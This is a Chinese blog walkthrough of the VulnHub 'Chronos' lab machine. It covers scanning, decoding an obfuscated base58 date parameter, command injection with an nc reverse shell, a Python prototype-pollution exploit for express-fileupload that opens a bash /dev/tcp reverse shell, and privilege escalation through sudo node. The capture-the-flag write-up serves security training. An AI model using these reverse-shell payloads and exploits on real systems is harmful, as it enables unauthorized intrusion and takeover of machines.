vulnhub靶场-Chronos

最新推荐文章于 2024-09-30 07:44:05 发布
最新推荐文章于 2024-09-30 07:44:05 发布
阅读量919 收藏 2
点赞数 1
分类专栏: 网络安全 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42947816/article/details/124699409
版权

1、靶机信息

靶机名称:Chronos

靶机难度:中等

虚拟机环境:此靶机推荐使用Virtualbox搭建

目标:取得 2 个 flag + root 权限

靶机地址:https://download.vulnhub.com/chronos/Chronos.ova

kali服务器IP

192.168.137.81

靶机IP

192.168.137.205

2、主机发现

通过使用arp协议对同一网段的靶机进行主机发现,扫描出192.168.137.205为我们目标靶机

arp-scan -l

3、端口扫描

通过使用nmap工具对全端口进行发现,再进行版本扫描,我们发现开放22,80,8000三个端口

nmap -p- 192.168.137.205

nmap -sV -p 22,80,8000 192.168.137.205

4、Web信息收集

4.1 打开80端口Web页面

4.2 查看页面源代码,我们在其中发现一串可疑信息,使用Cyberchef对js进行美化,调用JavaScript Beautify让其变为更直观

var _0x5bdf = [
	'150447srWefj',
	'70lwLrol',
	'1658165LmcNig',
	'open',
	'1260881JUqdKM',
	'10737CrnEEe',
	'2SjTdWC',
	'readyState',
	'responseText',
	'1278676qXleJg',
	'797116soVTES',
	'onreadystatechange',
	'http://chronos.local:8000/date?format=4ugYDuAkScCG5gMcZjEN3mALyG1dD5ZYsiCfWvQ2w9anYGyL',
	'User-Agent',
	'status',
	'1DYOODT',
	'400909Mbbcfr',
	'Chronos',
	'2QRBPWS',
	'getElementById',
	'innerHTML',
	'date'
];
(function (_0x506b95, _0x817e36) {
	var _0x244260 = _0x432d;
	while (!![]) {
		try {
			var _0x35824b = -parseInt(_0x244260(126)) * parseInt(_0x244260(144)) + parseInt(_0x244260(142)) + parseInt(_0x244260(127)) * parseInt(_0x244260(131)) + -parseInt(_0x244260(135)) + -parseInt(_0x244260(130)) * parseInt(_0x244260(141)) + -parseInt(_0x244260(136)) + parseInt(_0x244260(128)) * parseInt(_0x244260(132));
			if (_0x35824b === _0x817e36)
				break;
			else
				_0x506b95['push'](_0x506b95['shift']());
		} catch (_0x3fb1dc) {
			_0x506b95['push'](_0x506b95['shift']());
		}
	}
}(_0x5bdf, 831262));
function _0x432d(_0x16bd66, _0x33ffa9) {
	return _0x432d = function (_0x5bdf82, _0x432dc8) {
		_0x5bdf82 = _0x5bdf82 - 126;
		var _0x4da6e8 = _0x5bdf[_0x5bdf82];
		return _0x4da6e8;
	}, _0x432d(_0x16bd66, _0x33ffa9);
}
function loadDoc() {
	var _0x17df92 = _0x432d, _0x1cff55 = _0x17df92(143), _0x2beb35 = new XMLHttpRequest();
	_0x2beb35[_0x17df92(137)] = function () {
		var _0x146f5d = _0x17df92;
		this[_0x146f5d(133)] == 4 && this[_0x146f5d(140)] == 200 && (document[_0x146f5d(145)](_0x146f5d(147))[_0x146f5d(146)] = this[_0x146f5d(134)]);
	}, _0x2beb35[_0x17df92(129)]('GET', _0x17df92(138), !![]), _0x2beb35['setRequestHeader'](_0x17df92(139), _0x1cff55), _0x2beb35['send']();

4.3 在页面源代码中发现一串疑似Base编码,'http://chronos.local:8000/date?format=4ugYDuAkScCG5gMcZjEN3mALyG1dD5ZYsiCfWvQ2w9anYGyL',使用cyberchef 进行解码

解码前:

4ugYDuAkScCG5gMcZjEN3mALyG1dD5ZYsiCfWvQ2w9anYGyL

使用cyberchef magic功能解码后:

'+Today is %A, %B %d, %Y %H:%M:%S.'

4.4 http://chronos.local:8000 似乎是作者引导我们去访问这个站点,而这台靶机开放了8000端口,我们改一下/etc/hosts文件,重新刷新页面,页面出现了一行日期,这行日期就是4.3解码后的内容,那这边可能是存在一个命令执行

4.5 我们使用burp进行抓包,并修改base58的值,使用CyberChef 进行转换

4.6 burp修改请求,发现命令成功执行

4.7 使用nc进行反弹shell

&& nc 192.168.137.81 8888 | /bin/bash | nc 192.168.137.81 9999

base58编码后:

3Gho48Ayo8ZTkKBJiuZUzjx5XbQLrVocowNVvpHX9LSew4WpvASt4istptg6FQeT7kapen7QxKdVGC5uL75aG

5、本地提权

5.1 本地文件信息收集,发现本机还有一个用户imera

cat /etc/passwd

5.2 在imera目录下,发现user.txt,但我们没有权限访问,那作者的意图很明显,需要我们提权到imera用户或者root用户去打开这个文件

5.3 在/opt/chronos-v2/backend中,发现一个server.js文件,通过搜索,我们发现express fileupload存在一个命令注入漏洞,并且此web服务存在于本机127.0.0.1的8080端口

5.4 使用exp直接利用,取得imera用户权限

项目原文地址:Real-world JS - 1

import requests

cmd = 'bash -c "bash -i &> /dev/tcp/192.168.137.81/9999 0>&1"'

# pollute
requests.post('http://127.0.0.1:8080', files = {'__proto__.outputFunctionName': (
    None, f"x;console.log(1);process.mainModule.require('child_process').exec('{cmd}');x")})

# execute command
requests.get('http://127.0.0.1:8080')

5.5 获取第一个flag,在imera用户目录下

byBjaHJvbm9zIHBlcm5hZWkgZmlsZSBtb3UK

5.6 再次尝试提权到root,我们发现此用户可以无密码以root身份调用node和npm命令

5.7 使用node提权成功

sudo node -e 'child_process.spawn("/bin/sh", {stdio: [0, 1, 2]})'

5.8 拿到最后一个flag,在root目录下

YXBvcHNlIHNpb3BpIG1hemV1b3VtZSBvbmVpcmEK

KALC
关注
专栏目录
vulhub靶场chronos靶场渗透全过程 :
weixin_62319197的博客
03-14 460
本文记录了对vulhub一个靶场的打靶拿到root权限全过程 内容比较基础。
Vulnhub靶机--Chronos
Tauil的博客
08-05 648
登录靶机页面,查看网络数据包,发现有两个数据包被拒绝了,查看到其IP显示为chronos.local,其回显仍然是靶机IP,所以需要修改 dns 指向,在本地 hosts 文件中将该网站进行自定义转向,输入命令。尝试将该参数进行解码,发现是base58编码,并且该语句后面衔接其他命令是可执行的,那么要是该网页输入参数没有进行替换或者过滤的话,便可以执行任意语句。发现该靶机还开了另外一个网络服务,在本地8080端口,而外网无法访问到,我们先找到该网络服务所在文件,发现在另一个版本的chronos-v2中。..
Vulnhub靶场案例渗透[3]- DC2
最新发布
qq_45776114的博客
09-30 970
DC:2 靶场渗透记录。
vulnhub chronos
weixin_46107179的博客
04-06 4422
靶机下载地址 主机发现 二层扫描:arp-scan -l 或则 netdiscover -r 10.0.2.0/24,扫描得到主机的IP地址10.0.2.6 信息搜集 通过nmap信息搜集主机信息,得到主机开放了22,80,8000端口,并且用的web服务是通过node.js的Express framework写的,以及中间件是Apache等信息 然后用浏览器打开这两个端口,发现这两个页面其实是一个页面,知识80端口那个页面是8000端口加了css样式的,然后尝试扫描隐藏目录,并没有什么发现;但是在查
VulnHub靶场-Chronos
热爱学习,喜欢折腾!
06-11 891
Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBoxBoot打开,从启动虚机到获取操作系统的root权限和查看flag。
Vulnhub系列--CHRONOS: 1
ch3cke的博客
03-31 4351
本次渗透测试我将使用cs来辅助进行渗透: 打点 主机存活发现: ┌──(kali㉿kali)-[~] └─$ nmap -sP 192.168.56.1/24 Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-31 09:35 EDT mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or spec.
nim-chronos:Chronos-一个高效的异步编程库
02-03
**nim-chronos:Chronos——高效的异步编程库** Nim语言的生态系统中,`nim-chronos`是一个至关重要的库,它为开发者提供了强大的异步编程工具,旨在提高性能和可读性。异步编程是现代软件开发中的一个核心概念,...
eZ430-Chronos_Software.rar_ez430_chronos
09-24
《eZ430-Chronos智能手表软件详解》 eZ430-Chronos是一款集成微控制器的智能手表,由Texas Instruments(TI)公司推出,它将强大的嵌入式处理能力与时尚的可穿戴设计相结合。这款手表不仅具备传统时间显示功能,还...
PyPI 官网下载 | AlekSIS-App-Chronos-2.2.tar.gz
01-31
标题中的"PyPI 官网下载 | AlekSIS-App-Chronos-2.2.tar.gz"表明这是一个从Python Package Index(PyPI)官方源下载的软件包,名为"AlekSIS-App-Chronos-2.2",且其格式为tar.gz。PyPI是Python社区中最主要的第三方...
TI eZ430-Chronos Clock and Data Logger-开源
07-25
TI eZ430-Chronos是一款由德州仪器(Texas Instruments, TI)推出的开源智能手表,它集成了钟表功能和数据记录能力。这款设备专为开发者和爱好者设计,允许他们进行各种嵌入式系统实验和应用开发。开源的特性意味着...
docker-chronos:Debian Wheezy 上 Chronos 的 Dockerfile
06-01
docker-chronos 用于在 Debian Wheezy 上运行 Chronos 的 Dockerfile。 指示 使用 Docker: $ docker run tobiassvn/chronos --master zk://localhost:2181/mesos --zk_hosts localhost:2181 通过马拉松: { " ...
VulnHub靶场】——CHRONOS: 1
热门推荐
Demo不是emo的博客
12-31 1万+
24次系统性打靶第三次训练,每次打靶后都会分享靶场攻略和总结的知识点
VulnHub日记(十八):Chronos: 1
Dawn_Xi的博客
02-12 3180
参考链接 Vulnhub: 参考博客 GTFOBins 开始练习 本机ip:192.168.56.102 目的机ip:192.168.56.126 fping -aqg 192.168.56.0/24 nmap 扫描主机 nmap -A -T4 -v 192.168.56.126 扫描目录无果,开放22,80和8000,访问 内容相似,bp抓包,发现参数format 将内容进行识别,可能是base64或base58 两个都测试后,是base58 bp去除参数,查看结果比较,猜测是date命
Vulnhub靶机随笔-Chronos
weixin_59005129的博客
03-07 923
我们可以利用node,node就是类似于java语言的开发环境,我们平常写的是python反弹shell,今天写一个java的反弹shell 命令: sudo node -e 'child_process.spawn("/bin/bash", {stdio: [0,1,2]})'
VulnhubChronos:1 靶机实验
weixin_64112307的博客
06-30 1089
EJS-RCE
VnlnHub CHRONOS 1
weixin_45682839的博客
09-03 580
VnlnHub CHRONOS 1靶场通关攻略记录,涉及知识包括:端口服务探测、解编码、命令注入、nc串联、linux本地提权、框架漏洞利用
VulnHub-Chronos: 1
weixin_44249502的博客
08-25 348
本文介绍了VulnHub平台上的CHRONOS: 1虚拟靶场,旨在帮助网络安全爱好者提升技能。该靶场设计了多个真实场景,要求玩家使用渗透测试和漏洞利用技巧获取隐藏在系统中的flag。文章解释了靶场背景、玩法和优势,强调其为安全从业人员提供了实践经验,加强了防御和攻击能力。通过解决不同难度任务,参与者能够更好地应对不断出现的网络安全挑战。
Vulnhub:CHRONOS: 1
weixin_69670995的博客
06-15 585
在 /opt/chronos-v2/backend 下发现 express-fileupload,百度一下它的漏洞,找的了攻击代码。抓包发现有三个请求,最后一个显示了时间,将get传参进行解密,尝试了base64,结果失败,后来发现是base58解密。将下载的虚拟机导入Oracle VM VirtualBox中,网络设置仅主机模式,网卡使用和kali相同的网卡。发现是显示当前时间的命令,猜测是命令执行,尝试一下命令要用base58编码一下。发现22,80,8080端口,使用浏览器访问80端口。
靶机三:CHRONOS_ 1
travelnight的博客
05-05 382
靶机三:CHRONOS: 1
eZ430-Chronos开发工具全面指南:从入门到软件详解
"eZ430-Chronos™开发工具用户指南是一份详尽的文档,专为eZ430-Chronos™系列智能运动手表的开发者和用户设计。该指南旨在帮助用户理解和操作这款设备,包括设置时间与日期、安装驱动程序和固件、以及与PC的互动。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值